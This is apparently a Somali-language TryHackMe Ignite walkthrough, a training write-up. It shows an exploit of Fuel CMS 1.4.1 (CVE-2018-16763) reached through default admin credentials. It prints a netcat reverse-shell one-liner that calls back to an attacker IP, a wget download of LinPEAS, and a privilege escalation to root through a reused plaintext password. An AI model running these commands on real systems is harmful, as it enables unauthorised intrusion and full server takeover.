Sida loo Hacking Gareyo TryHackMe Ignite CTF
Ignite

Sida loo Hacking Gareyo TryHackMe Ignite CTF

Master advanced techniques and methodologies in ignite

Dec 21, 2025
20 min read
AlphaSploit Team
Ignite

Hordhac

Maqaalkani wuxuu soo bandhigayaa cashar tallaabo-tallaabo ah (walkthrough) oo ku saabsan Ignite. Waxaan xoogga saaraynaa aqoonsiga iyo ka faa'iidaysiga nugulaanta Remote Code Execution (RCE) ee ku dhex jirta Fuel CMS v1.4.1 (CVE-2018-16763).

Baadhitaankani wuxuu daboolayaa nidaamka macluumaad raadinta (enumeration), helitaanka daldaloolada, fulinta exploit-ka, iyo hawlaha ka dambeeya jabsashada. Sidoo kale, wuxuu muujinayaa sida loo kordhiyo mudnaanta (privilege escalation) iyadoo la adeegsanayo password-yo horay loo isticmaalay (credential reuse) oo ay sabab u tahay habayn xun, taas oo aakhirka noo horseedaysa inaan helno awoodda root.

Mawduucyada Muhiimka ah:

Enumeration: Macluumaad raadinta iyo aqoonsiga daldaloolada.

Exploit Analysis: Falanqaynta iyo fulinta exploit-ka.

Post-Exploitation: Waxqabadka ka dambeeya jabsashada iyo kordhinta mudnaanta (Privilege Escalation).

1: SCANNING

Sida Loo Adeegsado Nmap: Sahminta Amniga Qalabka (Target Reconnaissance)

Maanta waxaan idinla wadaagayaa mid ka mid ah aaladaha ugu muhiimsan ee qof kasta oo baranaya Cybersecurity uu u baahan yahay: Nmap. Haddii aad rabto inaad ogaato waxa ka dhex socda qalab ama server kale, Nmap waa saaxiibkaaga koowaad.

#### Waa maxay Scan-ka aan sameeyey?

Waxaan tijaabiyey amar aad u xooggan oo ah Aggressive Scan. Amarku wuxuu u qornaa gutan: nmap -sV -A -T4 10.81.139.78

  • -sV (Version Detection): Ma rabo kaliya inaan ogaado in port-ku furan yahay, waxaan rabaa inaan ogaado software-ka saxda ah ee halkaas ka shaqaynaya.
  • -A (Aggressive Mode): Kan waa "dhammaan-iyo-mid". Wuxuu isku darayaa ogaanshaha OS-ka, scripts-ka amniga, iyo raadraaca (traceroute).
  • -T4 (Speed): Waxaan kordhiyey xawaaraha baadhista si natiijadu degdeg iigu soo gaadho.
nmap -sV -A -T4 10.81.139.78

Nmap Results

2: FOOTHOLD

Marka uu scan-ku kuu soo baxo, waxaad arki doontaa in port-ka 80 uu furan yahay. Haddii aad browser-ka ku qorto IP-ga 10.81.139.78, waxaad geli doontaa bogga hore ee Fuel CMS, halkaas oo aad ka heli doonto xog dheeraad ah oo ku saabsan database-ka iyo password-yada qaarkood.

Fuel CMS Homepage

Markii aad u dhaadhacday gunta hoose ee bogga, waxaad helaysaa xog aad u muhiim ah oo ah "Admin Endpoint" iyo "Credentials" (magaca iyo password-ka) ee lagu galo nidaamka. Tani waa meesha uu ka bilaabmo daciifnimada nidaamka Ignite.

Helitaanka Meesha laga galo (Admin Access)

Intii aan ku jiray wejiga macluumaad raadinta (enumeration), waxaan u kuur-galay bogga hore ee websaydhka. Markii aan u dhaadhacay gunta hoose ee bogga (scrolling to the bottom), waxaan helay xog dahab ah oo inta badan dadka maamula websaydhada ay ilaawaan inay ka saaraan:

  • Admin Dashboard: /fuel
  • Username: admin
  • Password: admin
Tani waa tusaale cad oo muujinaya Misconfiguration (habayn xun). In password-ka loo daayo sidii loogu talagalay markii hore (default credentials) waxay sahlaysa in qof kasta oo raba uu gudaha u galo qaybta maamulka ee websaydhka.

#### Maxay tani ka dhigan tahay?

Helitaanka bogga admin-ka iyo password-kiisa waxay noo furaysaa jid aan ku baadhno gudaha software-ka Fuel CMS. Maadaama aan hadda haysano marinka maamulka, waxaan bilaabi karnaa inaan tijaabino nugulaanta RCE (Remote Code Execution) si aan ula wareegno server-ka oo dhan.

Admin Credentials

Gudaha u Galidda Dashboard-ka (Gaining Access)

Ka dib markii aan helay xogta gelitaanka, waxaan booqday cinwaanka ah http://10.81.139.78/fuel. Waxaan isticmaalay magaca iyo password-ka (admin / admin). Sidii la filayay, waxaan si guul leh ugu galay dashboard-ka maamulka ee Fuel CMS.

Login Page

Admin Dashboard

3: Exploit Execution

Helitaanka Daldaloolada (Vulnerability Discovery)

Mashiinku wuxuu isticmaalayay Fuel CMS 1.4.1, kaas oo loo yaqaano inuu leeyahay nugulaan RCE ah. Baadhitaan aan ka sameeyey Google ayaa ii horseeday Exploit-DB (CVE-2018-16763). Sidoo kale, waxaan ku helay isla exploit-kaas anigoo adeegsanaya aaladda searchsploit.

#### Fahanka Exploit-ka (Understanding the Exploit)

Nugulaantan waxay ka dhalatay habayn xun oo xogta lagu galiyo qaybta filter ee cinwaanka /fuel/pages/select/. Tani waxay oggolaanaysaa in la dhex geliyo code PHP ah, taas oo horseedaysa in meel fog laga maamulo amarrada mashiinka (RCE).

  • Sababta rasmiga ah: Validation la'aan ku saabsan waxyaabaha lagu qoro qaybta filter.
  • Saamaynta Amniga: In qof aan la aqoonsan uu fuliyo amarrada nidaamka.
#### Fulinta Exploit-ka (Exploit Execution)

Ka dib markii aan soo dejiyey script-ka exploit-ka, waxaan ku fuliyey mashiinka si aan u helo marin aan ku amro server-ka.

searchsploit FUEL CMS 1.4

Searchsploit Results

python 50477.py -u http://10.91.139.78/
whoami
ls
pwd
cd /home

Exploit Execution

4: Post Exploitation

Ka dib markii aan xaqiijiyay inaan fulin karo amarrada (RCE), waxaan go'aansaday inaan u beddelo xidhiidhkaas mid Reverse Shell ah si aan u helo terminal dhamaystiran oo aan kula macaamilo mashiinka.

Waxaan u adeegsaday websaydhka revshells.com si aan u diyaariyo code-ka (payload) ee nooca Python ama Bash ah. Ka dib markii aan mashiinkayga ka dhex furay "Listener" anigoo adeegsanaya amarka nc -lvnp 4444, waxaan mashiinka Ignite ku dhex fuliyey amarkii reverse shell-ka.

Isla markiiba, waxaan helay marin (access) aan ku galo mashiinka sidii user-ka www-data. Si aan terminal-ka uga dhigo mid u shaqeeya sidii "Real Shell" oo kale (Interactive Shell), waxaan isticmaalay amarka:

python -c 'import pty; pty.spawn("/bin/bash")'

Reverse Shell Setup

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.219.158 1111 >/tmp/f

Reverse Shell Connection

Shell Access

5: PRIVILEGE ESCALATION

Baadhista Mudnaan Kordhinta (Privilege Escalation Research)

Maadaama aan ahaa isticmaalaha caadiga ah ee www-data, waxaan u baahnaa inaan helo jid aan ku noqdo maamulaha guud (Root). Si aan shaqadaas u fududeeyo, waxaan mashiinka Ignite ku wareejiyey script-ka caanka ah ee LinPEAS.

cp /usr/share/peass/linpeas/linpeas.sh
python -m http.server

LinPEAS Setup

wget http://192.168.219.158:8000/linpeas.sh
ls
chmod +x linpeas.sh
./linpeas.sh

LinPEAS Download

LinPEAS Execution

LinPEAS Results

Helitaanka Password-ka Root

Markii aan gacantayda ku baadhay faylkaas uu LinPEAS ii tilmaamay, waxaan helay password si cad u qoran (plaintext). Waxaan tuhmay in password-kani uu ka tirsan yahay isticmaalaha root, maadaama dadka qaarkood ay caado u leeyihiin inay hal password meelo badan u isticmaalaan (Credential Reuse).

cat /var/www/html/fuel/application/config/database.php

Database Config File

Root Password Found

Waxaan isku dayey inaan u beddelo user-ka root anigoo adeegsanaya amarka: su root

Waxaan galiyey password-kii aan helay, waxaana isla markiiba noqday Root!

Root Flag

Hadda oo aan haysto awoodda ugu sarraysa ee mashiinka, waxaan u dhaqaaqay dhanka galka /root si aan u soo saaro calankii ugu dambeeyey:

cat /root/root.txt

Root Flag

Gunaanad: Maxaan ka baranay Ignite?

Mashiinkan wuxuu tusaale u yahay sida silsilad daciifnimo ah ay u horseedi karto in mashiinka oo dhan la xukumo:

1. CMS Duug ah: Isticmaalka Fuel CMS 1.4.1 oo leh daldalool RCE ah.

2. Xog aan la qarin: Kaydinta password-yada muhiimka ah iyagoo qoraal cad ah (plaintext) dhexdiisa faylal gurmad ah.

3. Password Reuse: Isticmaalka hal password oo loogu talagalay adeegyo kala duwan.

Continue Learning

Next ArticleView All Posts